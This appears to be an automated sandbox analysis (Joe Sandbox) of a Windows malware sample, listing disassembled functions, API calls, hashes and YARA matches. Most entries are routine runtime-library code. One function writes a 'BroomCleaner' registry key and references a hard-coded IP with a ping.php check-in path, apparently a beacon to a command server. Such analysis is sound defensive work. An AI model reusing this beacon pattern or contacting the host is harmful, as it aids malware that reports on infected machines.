WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,?,00000005,00000000,00000000), ref: 00415B11
WriteFile.KERNEL32(?,?,00000000,00416188,00000000,?,?,?,?,?,?,?,?,?,00416188,?), ref: 00415B30
WriteFile.KERNEL32(?,?,00000001,00416188,00000000,?,?,?,?,?,?,?,?,?,00416188,?), ref: 00415B69

Memory Dump Source

Source File: 00000000.00000002.2968466836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TNQTc6Qmkg.jbxd

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID:
API String ID: 1324828854-0
Opcode ID: 33e6fd75adb2b88f79627ef58a13688fd909e2cfbbaa5c9d8ec04a3e685d9078
Instruction ID: 93abb8da7f4b1ee22325e29d014a78f54aaad6af2ae94e442d530b7aeff6bc03
Opcode Fuzzy Hash: 33e6fd75adb2b88f79627ef58a13688fd909e2cfbbaa5c9d8ec04a3e685d9078
Instruction Fuzzy Hash: 7851E6B0A04609DFDB10CFA8D881BEEBBF4EF49310F14416BE955E7251D774A981CB68

Uniqueness

Uniqueness Score: -1.00%

Function 0040A6D0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 126COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 0040A6FB
___except_validate_context_record.LIBVCRUNTIME ref: 0040A703
_ValidateLocalCookies.LIBCMT ref: 0040A791
__IsNonwritableInCurrentImage.LIBCMT ref: 0040A7BC
_ValidateLocalCookies.LIBCMT ref: 0040A811

Strings

csm, xrefs: 0040A7A6

Memory Dump Source

Source File: 00000000.00000002.2968466836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TNQTc6Qmkg.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: 9c4d965ac64c68ad1acf27fcd63e115faa6e970b3dad7dcbeead64b99ae0827c
Instruction ID: 23505c37bb0df54e9d772fc2403dd448dd449399a7c5e18b9979e78af1eb181c
Opcode Fuzzy Hash: 9c4d965ac64c68ad1acf27fcd63e115faa6e970b3dad7dcbeead64b99ae0827c
Instruction Fuzzy Hash: B7415274E003089BCB10DF69C884A9EBBB5AF45318F14C17BE8156B3D2D739D925CB96

Uniqueness

Uniqueness Score: -1.00%

Function 05D163C1 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 85registryCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 05D163C6
RegCreateKeyExA.ADVAPI32(80000001,SOFTWARE\BroomCleaner,00000000,00000000,00000000,000F003F,00000000,?,00000000,Installed,0043BED8,SOFTWARE\BroomCleaner), ref: 05D163EE
RegSetValueExA.ADVAPI32(?,?,00000000,00000001,?,?,0043BED8,0043BED9,Installed,Installed), ref: 05D16471
RegCloseKey.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,185.172.128.90,/cpa/ping.php?substr=%s&s=ab&sub=%s,?), ref: 05D16492

Strings

Installed, xrefs: 05D163D0, 05D163FE, 05D1641D, 05D1641E
SOFTWARE\BroomCleaner, xrefs: 05D163CE, 05D163E1

Memory Dump Source

Source File: 00000000.00000002.2972687467.0000000005CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5cf0000_TNQTc6Qmkg.jbxd

Yara matches

Similarity

API ID: CloseCreateH_prologValue
String ID: Installed$SOFTWARE\BroomCleaner
API String ID: 1996196666-529226407
Opcode ID: 0b1f03838103bc79192dd29aecd11cdb4eee571ac517255c8300f4294fb95730
Instruction ID: 57fb3dece2b12e3abda4a6d6ff25838d5315e26c45d4c8599467380d82081f1d
Opcode Fuzzy Hash: 0b1f03838103bc79192dd29aecd11cdb4eee571ac517255c8300f4294fb95730
Instruction Fuzzy Hash: C9318771A00219EEDB149FA8DC94AFEBB79FB48314F54052EE902B7251C7715D06CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 004227A8 Relevance: 10.6, APIs: 7, Instructions: 80COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2968466836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TNQTc6Qmkg.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 791c7b4aae0b1c2b416b1f562a5509af260bb6d414dca8c56a91ecd19c1a7e4a
Instruction ID: e24961ea6169977100e6de332b8cae97d730c3ba4f888c233ff9c32580c66a3b
Opcode Fuzzy Hash: 791c7b4aae0b1c2b416b1f562a5509af260bb6d414dca8c56a91ecd19c1a7e4a
Instruction Fuzzy Hash: 1611E7726081297BDB203F739D059AB3A6CDF92764B51062AFC15D7251DABCC84282B9

Uniqueness

Uniqueness Score: -1.00%

Function 05D0F513 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 05D0F25A: _free.LIBCMT ref: 05D0F283

_free.LIBCMT ref: 05D0F561

Part of subcall function 05D06501: HeapFree.KERNEL32(00000000,00000000,?,05D0F288,?,00000000,?,00000000,?,05D0F52C,?,00000007,?,?,05D0F920,?), ref: 05D06517
Part of subcall function 05D06501: GetLastError.KERNEL32(?,?,05D0F288,?,00000000,?,00000000,?,05D0F52C,?,00000007,?,?,05D0F920,?,?), ref: 05D06529

_free.LIBCMT ref: 05D0F56C
_free.LIBCMT ref: 05D0F577
_free.LIBCMT ref: 05D0F5CB
_free.LIBCMT ref: 05D0F5D6
_free.LIBCMT ref: 05D0F5E1
_free.LIBCMT ref: 05D0F5EC

Memory Dump Source

Source File: 00000000.00000002.2972687467.0000000005CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5cf0000_TNQTc6Qmkg.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 501a0837026fe0814ab2d6a77f43a53b196c1575d4fb2c1b0167c2d280276289
Instruction ID: 0172b9b800ff1564d7dd8a8343606ade361bd471feb672e75acd6113ffd348df
Opcode Fuzzy Hash: 501a0837026fe0814ab2d6a77f43a53b196c1575d4fb2c1b0167c2d280276289
Instruction Fuzzy Hash: F5118472640B04AADA30B7B0CC4EFCB7B9DEF44B00F501916A699A60D4DA39F514CA61

Uniqueness

Uniqueness Score: -1.00%

Function 0041F2AC Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0041EFF3: _free.LIBCMT ref: 0041F01C

_free.LIBCMT ref: 0041F2FA

Part of subcall function 0041629A: RtlFreeHeap.NTDLL(00000000,00000000,?,0041F021,?,00000000,?,00000000,?,0041F2C5,?,00000007,?,?,0041F6B9,?), ref: 004162B0
Part of subcall function 0041629A: GetLastError.KERNEL32(?,?,0041F021,?,00000000,?,00000000,?,0041F2C5,?,00000007,?,?,0041F6B9,?,?), ref: 004162C2

_free.LIBCMT ref: 0041F305
_free.LIBCMT ref: 0041F310
_free.LIBCMT ref: 0041F364
_free.LIBCMT ref: 0041F36F
_free.LIBCMT ref: 0041F37A
_free.LIBCMT ref: 0041F385

Memory Dump Source

Source File: 00000000.00000002.2968466836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TNQTc6Qmkg.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 501a0837026fe0814ab2d6a77f43a53b196c1575d4fb2c1b0167c2d280276289
Instruction ID: be7813cec9e76b844f682d4c097dbd82c10abeb52ecb146189267b1763b940f2
Opcode Fuzzy Hash: 501a0837026fe0814ab2d6a77f43a53b196c1575d4fb2c1b0167c2d280276289
Instruction Fuzzy Hash: 1F114272541B24B6D920BB72DC07FCBB7DCBF44708F40081EBE9E66052DA7DB5868654

Uniqueness

Uniqueness Score: -1.00%

Function 05CF43F0 Relevance: 10.6, APIs: 7, Instructions: 59COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 05CF43F5
std::_Lockit::_Lockit.LIBCPMT ref: 05CF4404
int.LIBCPMT ref: 05CF441B

Part of subcall function 05CF157F: std::_Lockit::_Lockit.LIBCPMT ref: 05CF1590
Part of subcall function 05CF157F: std::_Lockit::~_Lockit.LIBCPMT ref: 05CF15AA

std::locale::_Getfacet.LIBCPMT ref: 05CF4424
std::_Facet_Register.LIBCPMT ref: 05CF4455
std::_Lockit::~_Lockit.LIBCPMT ref: 05CF446B
__CxxThrowException@8.LIBVCRUNTIME ref: 05CF4491

Memory Dump Source

Source File: 00000000.00000002.2972687467.0000000005CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5cf0000_TNQTc6Qmkg.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetH_prologRegisterThrowstd::locale::_
String ID:
API String ID: 1202896665-0
Opcode ID: e4831a17e9389af87c191ca157e46dd7d187b50277cf216024756019587e60ea
Instruction ID: f4eef84b377bcac253d29bdc1c769333b80774107fcd0b4cb028f7f8044c0ee5
Opcode Fuzzy Hash: e4831a17e9389af87c191ca157e46dd7d187b50277cf216024756019587e60ea
Instruction Fuzzy Hash: 5911E732E00118DBCF48EBA4DC48AEEBB75FF84714F15491AEA15B7290DB749A01C7E4

Uniqueness

Uniqueness Score: -1.00%

Function 05CF3651 Relevance: 10.6, APIs: 7, Instructions: 57COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 05CF3656
std::_Lockit::_Lockit.LIBCPMT ref: 05CF3665
int.LIBCPMT ref: 05CF367C

Part of subcall function 05CF157F: std::_Lockit::_Lockit.LIBCPMT ref: 05CF1590
Part of subcall function 05CF157F: std::_Lockit::~_Lockit.LIBCPMT ref: 05CF15AA

std::locale::_Getfacet.LIBCPMT ref: 05CF3685
std::_Facet_Register.LIBCPMT ref: 05CF36B6
std::_Lockit::~_Lockit.LIBCPMT ref: 05CF36CC
__CxxThrowException@8.LIBVCRUNTIME ref: 05CF36F2

Memory Dump Source

Source File: 00000000.00000002.2972687467.0000000005CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5cf0000_TNQTc6Qmkg.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetH_prologRegisterThrowstd::locale::_
String ID:
API String ID: 1202896665-0
Opcode ID: d912247cf65187564cb857c5a435760ff66a759f63cb392730071c1b62a8ae47
Instruction ID: c43e6b4ca7e6e4578558237498fa517ada204f69d67b1f9565fdca883d4941bc
Opcode Fuzzy Hash: d912247cf65187564cb857c5a435760ff66a759f63cb392730071c1b62a8ae47
Instruction Fuzzy Hash: 3411C672E00128EBCB45EBA4C808AEE77B5FF84750F140D1AEA15B7390DB749A04D7D4

Uniqueness

Uniqueness Score: -1.00%

Function 05CF385C Relevance: 10.6, APIs: 7, Instructions: 57COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 05CF3861
std::_Lockit::_Lockit.LIBCPMT ref: 05CF3870
int.LIBCPMT ref: 05CF3887

Part of subcall function 05CF157F: std::_Lockit::_Lockit.LIBCPMT ref: 05CF1590
Part of subcall function 05CF157F: std::_Lockit::~_Lockit.LIBCPMT ref: 05CF15AA

std::locale::_Getfacet.LIBCPMT ref: 05CF3890
std::_Facet_Register.LIBCPMT ref: 05CF38C1
std::_Lockit::~_Lockit.LIBCPMT ref: 05CF38D7
__CxxThrowException@8.LIBVCRUNTIME ref: 05CF38FD

Memory Dump Source

Source File: 00000000.00000002.2972687467.0000000005CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5cf0000_TNQTc6Qmkg.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetH_prologRegisterThrowstd::locale::_
String ID:
API String ID: 1202896665-0
Opcode ID: 01699667aa2a77937d9adaa910a4886983fe4db3813f95f217182bdb03a19c45
Instruction ID: 32bcaf74a6a1c91b1376a1c3372bfe5b7a8a0cd4994fa96f8c78082a11ba1c74
Opcode Fuzzy Hash: 01699667aa2a77937d9adaa910a4886983fe4db3813f95f217182bdb03a19c45
Instruction Fuzzy Hash: AD11A772E00114EBCB45EBA4D808AEEB7B5EF44710F154D1AEA15B7290DB749A04D794

Uniqueness

Uniqueness Score: -1.00%

Function 004033EA Relevance: 10.6, APIs: 7, Instructions: 57COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 004033EF
std::_Lockit::_Lockit.LIBCPMT ref: 004033FE
int.LIBCPMT ref: 00403415

Part of subcall function 00401318: std::_Lockit::_Lockit.LIBCPMT ref: 00401329
Part of subcall function 00401318: std::_Lockit::~_Lockit.LIBCPMT ref: 00401343

std::locale::_Getfacet.LIBCPMT ref: 0040341E
std::_Facet_Register.LIBCPMT ref: 0040344F
std::_Lockit::~_Lockit.LIBCPMT ref: 00403465
__CxxThrowException@8.LIBVCRUNTIME ref: 0040348B

Memory Dump Source

Source File: 00000000.00000002.2968466836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TNQTc6Qmkg.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetH_prologRegisterThrowstd::locale::_
String ID:
API String ID: 1202896665-0
Opcode ID: 1a48900830679c46dc0be6a0f1d465924297f1cf3026a4340555d262ddfbec7c
Instruction ID: cdc69c2a9e90ba919e1258be772e803faed7ee3eebec81448dba6679bc4cf361
Opcode Fuzzy Hash: 1a48900830679c46dc0be6a0f1d465924297f1cf3026a4340555d262ddfbec7c
Instruction Fuzzy Hash: 8E11BF329001289BCB05EFA4C815AEE7B78EF84319F10452EE911BB2D1DB789A04CB99

Uniqueness

Uniqueness Score: -1.00%

Function 004035F5 Relevance: 10.6, APIs: 7, Instructions: 57COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 004035FA
std::_Lockit::_Lockit.LIBCPMT ref: 00403609
int.LIBCPMT ref: 00403620

Part of subcall function 00401318: std::_Lockit::_Lockit.LIBCPMT ref: 00401329
Part of subcall function 00401318: std::_Lockit::~_Lockit.LIBCPMT ref: 00401343

std::locale::_Getfacet.LIBCPMT ref: 00403629
std::_Facet_Register.LIBCPMT ref: 0040365A
std::_Lockit::~_Lockit.LIBCPMT ref: 00403670
__CxxThrowException@8.LIBVCRUNTIME ref: 00403696

Memory Dump Source

Source File: 00000000.00000002.2968466836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TNQTc6Qmkg.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetH_prologRegisterThrowstd::locale::_
String ID:
API String ID: 1202896665-0
Opcode ID: ca0cfb35cbf3f9a9490d45cd706726dd781f1bc8c642c101c97a62d8b5f5316d
Instruction ID: 76a64bb1f13388b8652502aa8a079a3a0bf37f657045f8e793a704159d5c315e
Opcode Fuzzy Hash: ca0cfb35cbf3f9a9490d45cd706726dd781f1bc8c642c101c97a62d8b5f5316d
Instruction Fuzzy Hash: FA119032900124ABCB14EF65C805AEE7B74AF48319F10456FE911B73D1DB389A04C799

Uniqueness

Uniqueness Score: -1.00%

Function 05D17D27 Relevance: 9.3, APIs: 6, Instructions: 276COMMON

Download Yara Rule

APIs

_ValidateScopeTableHandlers.LIBCMT ref: 05D17E37
__FindPESection.LIBCMT ref: 05D17E51

Memory Dump Source

Source File: 00000000.00000002.2972687467.0000000005CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5cf0000_TNQTc6Qmkg.jbxd

Yara matches

Similarity

API ID: FindHandlersScopeSectionTableValidate
String ID:
API String ID: 876702719-0
Opcode ID: bc384f76d8f635c5b2c6c749d7951069b59a0ece1133742fdae5e3cbfd5bbb72
Instruction ID: 7b5753aab933b301abb3fdda78989aed8565dd17a80bc028a2d61761add301b6
Opcode Fuzzy Hash: bc384f76d8f635c5b2c6c749d7951069b59a0ece1133742fdae5e3cbfd5bbb72
Instruction Fuzzy Hash: D4A1B272A04615EBCB15CF68E8C4AAEB7B5FB08310F15426ADC05AB361D735ED41CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 00427AC0 Relevance: 9.3, APIs: 6, Instructions: 276COMMONLIBRARYCODE

Download Yara Rule

APIs

_ValidateScopeTableHandlers.LIBCMT ref: 00427BD0
__FindPESection.LIBCMT ref: 00427BEA

Memory Dump Source

Source File: 00000000.00000002.2968466836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TNQTc6Qmkg.jbxd

Similarity

API ID: FindHandlersScopeSectionTableValidate
String ID:
API String ID: 876702719-0
Opcode ID: bc384f76d8f635c5b2c6c749d7951069b59a0ece1133742fdae5e3cbfd5bbb72
Instruction ID: 52cd69d4b64803fa133344d4e9d29b6b42e74987d25fff38166c3f8cc652100c
Opcode Fuzzy Hash: bc384f76d8f635c5b2c6c749d7951069b59a0ece1133742fdae5e3cbfd5bbb72
Instruction Fuzzy Hash: 73A1D172B08225CFCB15CF69E9807AEB7B4EB44314F95466AD805EB351D739EC00CB98

Uniqueness

Uniqueness Score: -1.00%

Function 05D069A6 Relevance: 9.2, APIs: 6, Instructions: 216COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,?,?,?,?,?,05D06BF7,00000001,00000001,?), ref: 05D06A00
MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,05D06BF7,00000001,00000001,?,?,?,?), ref: 05D06A86
WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 05D06B80
__freea.LIBCMT ref: 05D06B8D

Part of subcall function 05D07CAC: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 05D07CDE

__freea.LIBCMT ref: 05D06B96
__freea.LIBCMT ref: 05D06BBB

Memory Dump Source

Source File: 00000000.00000002.2972687467.0000000005CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5cf0000_TNQTc6Qmkg.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide__freea$AllocateHeap
String ID:
API String ID: 1414292761-0
Opcode ID: e585c11a09ad45e81fd8c7ab38732ec500fb5332ab6a3e035dec317634217569
Instruction ID: d119b8aba57aef67e87cf95bcefa1914f49e20093b03ad077b1bd012108e87c8
Opcode Fuzzy Hash: e585c11a09ad45e81fd8c7ab38732ec500fb5332ab6a3e035dec317634217569
Instruction Fuzzy Hash: 2051D1B2700216AFDF25AF60CC44FAB77AAEB44761F15562AFD05DB180DB74EC60C6A0

Uniqueness

Uniqueness Score: -1.00%

Function 05D01CD3 Relevance: 9.2, APIs: 6, Instructions: 200COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftoe.LIBCMT ref: 05D01CFF
__cftoe.LIBCMT ref: 05D01D31

Memory Dump Source

Source File: 00000000.00000002.2972687467.0000000005CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5cf0000_TNQTc6Qmkg.jbxd

Yara matches

Similarity

API ID: __cftoe
String ID:
API String ID: 4189289331-0
Opcode ID: 90da76973bb766ea4a315db8452379bb561b87577be5415ac3e43ae82e0a4dd4
Instruction ID: f3562aaf5daeb9e1547060d0e7b75ef7f9634b1e32f68f2a7dbdd01a56c1186e
Opcode Fuzzy Hash: 90da76973bb766ea4a315db8452379bb561b87577be5415ac3e43ae82e0a4dd4
Instruction Fuzzy Hash: 9551D572A04605ABDF249BE98C48FBE77A9FF49360F10621FF815962D0DB31D941CA74

Uniqueness

Uniqueness Score: -1.00%

Function 00411A6C Relevance: 9.2, APIs: 6, Instructions: 200COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftoe.LIBCMT ref: 00411A98
__cftoe.LIBCMT ref: 00411ACA

Memory Dump Source

Source File: 00000000.00000002.2968466836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TNQTc6Qmkg.jbxd

Similarity

API ID: __cftoe
String ID:
API String ID: 4189289331-0
Opcode ID: 3abcaf1d833c0b43dbdf51c67ed2576d6ab8f65321eebda5ff6643d6b04ddf7b
Instruction ID: df7bbd6b43df22bb4be9fc1c410e64f9820c02350ec4393f10609d324cfe3ba4
Opcode Fuzzy Hash: 3abcaf1d833c0b43dbdf51c67ed2576d6ab8f65321eebda5ff6643d6b04ddf7b
Instruction Fuzzy Hash: 7551FD72904205ABDF209B699D41EEF77A99F48364F10011FFA15962A2EB3DDD80C65C

Uniqueness

Uniqueness Score: -1.00%

Function 05CFCC22 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,05CFCC19,05CFA4C2), ref: 05CFCC30
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 05CFCC3E
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 05CFCC57
SetLastError.KERNEL32(00000000,?,05CFCC19,05CFA4C2), ref: 05CFCCA9

Memory Dump Source

Source File: 00000000.00000002.2972687467.0000000005CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5cf0000_TNQTc6Qmkg.jbxd

Yara matches

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 152d12fcc9b38d6eb509e9b18f925b7f1960da531015352f4daf10028e3799ab
Instruction ID: bfb2ebb5e7ea39946675e3391c9f63b674c65e396aee7dd57921fa904b26901a
Opcode Fuzzy Hash: 152d12fcc9b38d6eb509e9b18f925b7f1960da531015352f4daf10028e3799ab
Instruction Fuzzy Hash: E201D83230D7155EA7A96A757D8CA672B65FB0177A7200A3EE325810F0EF614C116745

Uniqueness

Uniqueness Score: -1.00%

Function 0040C9BB Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,0040C9B2,0040A25B), ref: 0040C9C9
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0040C9D7
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0040C9F0
SetLastError.KERNEL32(00000000,?,0040C9B2,0040A25B), ref: 0040CA42

Memory Dump Source

Source File: 00000000.00000002.2968466836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TNQTc6Qmkg.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 66d02c04e50153416cc93ba8b6edd56c70a26ab52024bca67481ef804eeef542
Instruction ID: ee19b3e2510f7423959140ec21889b16034e20938e88c6190324d52fb0663b51
Opcode Fuzzy Hash: 66d02c04e50153416cc93ba8b6edd56c70a26ab52024bca67481ef804eeef542
Instruction Fuzzy Hash: 8601F572649215AEE6395FB9BDC56572A54DB01338720033FF214B12F0EA794C16954C

Uniqueness

Uniqueness Score: -1.00%

Function 05D06F80 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,05CFE697,?,?,?,05CFED94,?), ref: 05D06F84
_free.LIBCMT ref: 05D06FB7
_free.LIBCMT ref: 05D06FDF
SetLastError.KERNEL32(00000000), ref: 05D06FEC
SetLastError.KERNEL32(00000000), ref: 05D06FF8
_abort.LIBCMT ref: 05D06FFE

Memory Dump Source

Source File: 00000000.00000002.2972687467.0000000005CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5cf0000_TNQTc6Qmkg.jbxd

Yara matches

Similarity

API ID: ErrorLast$_free$_abort
String ID:
API String ID: 3160817290-0
Opcode ID: a2875e3ccb6b8632a006c07bc9f65a419aef02cbdef471612c5cc690c003f94f
Instruction ID: 200dd08b67b232758b0eaf7b86c663e3c1ee6cdbce392fb92c13e8a9aa5bbbd7
Opcode Fuzzy Hash: a2875e3ccb6b8632a006c07bc9f65a419aef02cbdef471612c5cc690c003f94f
Instruction Fuzzy Hash: D9F0A4757486112AD22233766C0CF6B2A1AEFC17B1F652027F956D62D4EE21CC22C279

Uniqueness

Uniqueness Score: -1.00%

Function 00416D19 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,0040E430,?,?,?,0040EB2D,?), ref: 00416D1D
_free.LIBCMT ref: 00416D50
_free.LIBCMT ref: 00416D78
SetLastError.KERNEL32(00000000), ref: 00416D85
SetLastError.KERNEL32(00000000), ref: 00416D91
_abort.LIBCMT ref: 00416D97

Memory Dump Source

Source File: 00000000.00000002.2968466836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TNQTc6Qmkg.jbxd

Similarity

API ID: ErrorLast$_free$_abort
String ID:
API String ID: 3160817290-0
Opcode ID: a2875e3ccb6b8632a006c07bc9f65a419aef02cbdef471612c5cc690c003f94f
Instruction ID: dffb23d06d1e15ef1aad1c845134e5c8e8eacf90562cc3591d5b7c0101a08115
Opcode Fuzzy Hash: a2875e3ccb6b8632a006c07bc9f65a419aef02cbdef471612c5cc690c003f94f
Instruction Fuzzy Hash: BDF0F43178871026C2227B367C0ABDB26299FC1775F22052FF91D92291EF2CDCC2815D

Uniqueness

Uniqueness Score: -1.00%

Function 00417253 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 52libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,-@,00000000,00000000,?,004171FA,-@,00000000,00000000,00000000,?,004174B2,00000006,FlsSetValue), ref: 00417285
GetLastError.KERNEL32(?,004171FA,-@,00000000,00000000,00000000,?,004174B2,00000006,FlsSetValue,0042F340,FlsSetValue,00000000,00000364,?,00416DEB), ref: 00417291
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,004171FA,-@,00000000,00000000,00000000,?,004174B2,00000006,FlsSetValue,0042F340,FlsSetValue,00000000), ref: 0041729F

Strings

-@, xrefs: 0041727C

Memory Dump Source

Source File: 00000000.00000002.2968466836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TNQTc6Qmkg.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID: -@
API String ID: 3177248105-2564449678
Opcode ID: 26bf22cc59954dcc6720876a51754d7684b8387ef23ad7c861cfe47f39fec3a2
Instruction ID: 7e42d4c6809e44159ca8b586cb0097734ec1077dc4da662fe3f049ba49388dcf
Opcode Fuzzy Hash: 26bf22cc59954dcc6720876a51754d7684b8387ef23ad7c861cfe47f39fec3a2
Instruction Fuzzy Hash: 8B01F7367492279BC7314B699C44A977BB8AF55760B500671F909D7240DB34DC43C6E8

Uniqueness

Uniqueness Score: -1.00%

Function 05CF1AE6 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 39COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 05CF1B30
std::system_error::system_error.LIBCPMT ref: 05CF1B3F

Strings

ios_base::failbit set, xrefs: 05CF1B02, 05CF1B39
ios_base::eofbit set, xrefs: 05CF1B07
ios_base::badbit set, xrefs: 05CF1AF7, 05CF1B18

Memory Dump Source

Source File: 00000000.00000002.2972687467.0000000005CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5cf0000_TNQTc6Qmkg.jbxd

Yara matches

Similarity

API ID: Exception@8Throwstd::system_error::system_error
String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
API String ID: 1589814233-1866435925
Opcode ID: 2b3e5ca4bc1d127b2dba606601132dddbbf971fcac2ee0ac16a13b9037fe9581
Instruction ID: cad98d5f69a3352246dc93750f442e6bdc5e2cc3155e3cf6a6db3ad340fc4e9a
Opcode Fuzzy Hash: 2b3e5ca4bc1d127b2dba606601132dddbbf971fcac2ee0ac16a13b9037fe9581
Instruction Fuzzy Hash: 32F0F6B160436DF7CB50AA90DC08FE97BA89F49690F19C825EF4466180E7F55A04C3F8

Uniqueness

